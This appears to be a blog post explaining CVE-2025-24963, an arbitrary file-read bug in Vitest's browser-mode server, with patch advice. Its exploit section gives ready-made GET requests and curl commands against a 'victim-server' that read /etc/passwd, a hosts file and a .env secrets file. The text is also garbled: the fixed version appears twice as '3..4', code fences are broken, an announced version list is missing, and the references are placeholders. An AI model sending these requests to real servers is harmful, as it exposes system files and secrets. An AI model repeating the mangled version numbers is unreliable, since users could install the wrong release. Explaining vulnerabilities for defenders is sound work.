CVE-2025-24963 - Vitest Browser Mode File Disclosure Vulnerability – Simple Exploit and Patch Instructions

Vitest is a popular lightning-fast unit test framework powered by Vite. Recently, CVE-2025-24963 revealed a serious vulnerability that could let attackers read any file from your machine—if you’re running a misconfigured Vitest server. Here’s what you need to know, including how the problem happens, how it can be exploited, and how to fix it. All in plain language.

What Is the Problem?

In Vitest, when you run vitest --browser, it spins up an internal HTTP server for working with browser-based tests. To make troubleshooting easier, the server exposes a special handler called __screenshot-error. Originally, this route was only supposed to help with debugging failed screenshots.

But: A code change (commit 2d62051, May 2024) made it so this handler would respond with the contents of _any file_ asked for via the URL.

If your server is exposed on the network with browser.api.host: true, any computer on the internet can ask to see files—like source code, configs, or secret keys.

How the Exploit Works

Whenever the Vitest browser server is started with network exposure (browser.api.host: true), the server listens to all incoming requests.

The vulnerable code lets any HTTP request like this fetch any file

GET /__screenshot-error?filename=/etc/passwd

Or, on Windows

GET /__screenshot-error?filename=C:\Windows\System32\drivers\etc\hosts

Here’s a simplified version of the route handler

// inside the browser server route handler
app.get('/__screenshot-error', (req, res) => {
  const filename = decodeURIComponent(req.query.filename)
  fs.readFile(filename, 'utf-8', (err, content) => {
    if (err) {
      res.status(404).send('Not found')
    } else {
      res.type('text/plain').send(content)
    }
  })
})

> ✅ Fixed in: Vitest 2.1.9 and 3..4 (GitHub diff for the fix)

`bash

curl "http://victim-server:51204/__screenshot-error?filename=/etc/passwd"

`bash

curl "http://victim-server:51204/__screenshot-error?filename=/home/ubuntu/.env"

Who Is at Risk?

- Anyone running Vitest in browser mode on a public networked server with browser.api.host: true.

How To Fix CVE-2025-24963

There is no workaround—the only solution is to upgrade Vitest to one of these fixed versions:

Get them here: npmjs.com/package/vitest

> To upgrade:
>

> npm install vitest@^2.1.9
> # or
> npm install vitest@^3..4
> 

Additionally, never expose your test servers to the public internet unless you absolutely need to.

Timeline

- Vulnerability introduced: Commit 2d62051

References

- GitHub Vitest Security Advisory (placeholder; use official link when available)
- Mitre CVE Record for CVE-2025-24963 (once published)
- Diff showing the fix
- Commit that introduced the bug

Summary

- If you use Vitest with browser.api.host: true, anyone can fetch any file if you have not upgraded.

Timeline

Published on: 02/04/2025 20:15:50 UTC